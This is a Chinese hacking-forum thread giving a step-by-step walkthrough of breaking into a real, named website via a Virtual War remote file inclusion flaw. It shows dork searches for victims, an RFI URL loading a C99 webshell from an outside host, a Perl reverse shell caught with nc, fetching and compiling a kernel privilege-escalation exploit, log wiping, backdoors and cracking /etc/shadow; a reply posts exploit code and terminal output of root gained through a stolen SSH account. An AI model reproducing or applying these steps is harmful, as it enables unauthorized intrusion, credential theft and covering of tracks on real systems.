议题作者：逝水
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

  现在网络上的unix机器一直有熊起的势头啊，呵呵 。菜鸟们也都把眼光转向了这个令人神往的操作系统了 。呵呵，由于我只也是刚入门而已，高深的技术不会，但是偶还是会把偶这点仅有的经验写出来供大家消遣。呵呵，我总是有那么多的 屁话啊。OK，不说了。文章没什么技术性仅供大家娱乐一下^-^
   vwar系统多个文件存在远程文件调用漏洞具体代码如下
  // get functions
$vwar_root = "./";

require ($vwar_root . "includes/functions_common.php");
require ($vwar_root . "includes/functions_front.php");


Vwar_root parameter File inclusion

Aut File

war.php,stats.php,news.php,joinus.php,challenge.php,calendar.php,member.php,popup.php

and

all admin folder files
---------------------------------------
example

1)

http://victim.com/path/admin/admin.php?vwar_root=http://evilsite

2)(phpnuke module)

http://victim.com/path/modules/v ... oot=http://evilsite

好了，看到这些BUG的介绍以后，大家是不是有点急不可带了呢？OK，下面我们都一起来开始我们这次拿root之旅吧。大家在google里搜"Powered by: Virtual War v1.5.0" OR inurl:"modules.php?name=vwar"，可以找到很多使用这个系统的网站.
这里我也找到一个http://fp.iag-clan.de/vwar/war.php
好了，我们来够造一下吧，完整的URL就是：http://fp.iag-clan.de/vwar/admin ... m/1.txt?&cmd=ls这里的http://x-lab.minipars.com/1.txt是事先传好了的C99shell老外经常用的一个PHP木马，当然了，你也可以换成其他的shell。成功的运行了我们的C99SHELL了，下面就是找一个可写的目录了。一般这个系统的upload和backup是可以写的，有时候images目录也是可以写的。我这里就用upload目录吧，先传一个shell上去，这里我就用angle的那个phpsky2006吧，
这样我们就有这个站的一个webshell了。先传个工具上去吧，rn.pl这是是具有反弹功能perl脚本，clean是我已经编译好了的用于日志清除的工具,这些大家都可以在网上下载。好了，先连到本地吧，在我机器上用nc监听16398端口，然后在angle的shell上执行perl rn.pl IP 16398这里IP是我自己的外网IP。好了成功的弹出一个shell到我的机器上了
如果运行命令的时候出现否则会出现collect2: cannot find `错误！那就先自定义一一条路径，export PATH=/usr/bin:$PATH等。嘿嘿，大家可以看到这个版本不是很高的哦，现在有很多EXP都是适合这个版本的比如Linux Kernel moxa串行驱动BSS溢出漏洞，Linux Kernel uselib()特权提升漏洞，Linux Kernel do_mremap VMA本地权限提升漏洞，Linux Kernel kmod/ptrace竞争条件权限提升漏洞，等等，大家可以在http://milw0rm.com/这里找到这些相应的EXP代码了，呵呵。好了我们现在来提升权限吧^-^.建议大家先cd /tmp目录.用wget 来下载吧，在有些SUN操作系统的机器，没有装wget的，这样的我们还可以使用curl来下载，效果都是一样的，呵呵。要是两个都没有了那就自己编译一个从webshell上传上去吧！~
  这里我就使用Linux kernel do_brk vma overflow exploit.就是这个http://packetstormsecurity.org/0312-exploits/hatorihanzo.c
然后wget下载，编译执行。。。呵呵。给大家接个图吧！~
好了成功拿到了root了，。嘿嘿以后就是clean log了。最后在install backdoor 了。Cat /etc/shadow然后破解也是一个不错的方法。有什么不明白的大家也可以看看我以前的那个“拥有你的第一只*NIX肉鸡”一偏很垃圾的文章了。好了 ，。一口气能写到这里我的手眼睛也受不了了，文章没什么新的方法，就是用PHP injection 到传webshell到找exp提权。真正实践过程中会遇到很多的问题。这需要大家自己慢慢解决。还是那句话“面包会有的，房子会有的，ＢＵＧ也会有的…”希望高手加我赐教QQ：278747467

建议逝水兄把装VNC跨平台的安装说一下，我说前面的，用FTP下载，呵呵！简单吧！这个东西安装后和WIN的3389差不多！适合喜欢界面的菜鸟朋友！

vnc在win下安装就没什么说的哦
在linux下是去下载rpm包，rpm -ivh xxx.rpm
默认端口开1！密码自己设置```
（vncserver）

那个站的系统好像升级了，现在溢出不了了！！

引用:

这里是引用第[3 楼]的xhming于2006-04-26 20:53发表的：
那个站的系统好像升级了，现在溢出不了了！！

哈哈，这个站以前被黑的一塌糊涂，不升级才怪。没想到还真有人去验证哦！~汗

还有一点，寂寞宝贝说我写的太简单了点，很多地方没说明白，先前的那个1.txt的shell是通过vwar-root=这个来运行远程的shell，现在不是有很多CGI和PHP的程序都是向这样index.cgi?p=hun.cgi的吗？就是在服务器上通过变量转向执行其他的文件，而这个vwar系统的问题就只这个没处理好，我们可以使他转象我们的一个shell，呵呵，但是这个shell还是远程网站的，不是他服务器里的，所以我们需要同远程的这个shell上传本地的shell到他的服务器上，这样他的服务器才真真的有了我们的webshell了。
说的很饶口。不知道我说清楚了没有！~^@^

真不好意思，我真的还没在linux的机子里溢出过｀～ [s:34]

b += PAGE_SIZE;
}
ldt(m);
expand();
knockout();
shell();
}
int main(void)
{
configure();
remap();
return EXIT_FAILURE;
}


[1]+  Stopped            cat >r00t.c
[city@visual tmp]$ gcc -o r00t r00t.c -static
[city@visual tmp]$ chmod +x brk
chmod: getting attributes of `brk': No such file or directory
[city@visual tmp]$ chmod +x r00t
[city@visual tmp]$ /tmp/r00t
sh-2.05a# id
uid=0(root) gid=0(root)
sh-2.05a#

谢谢了
哈哈
把我以前搞到的SSH帐号用这个exploit得到了 r00t
happy r00ting....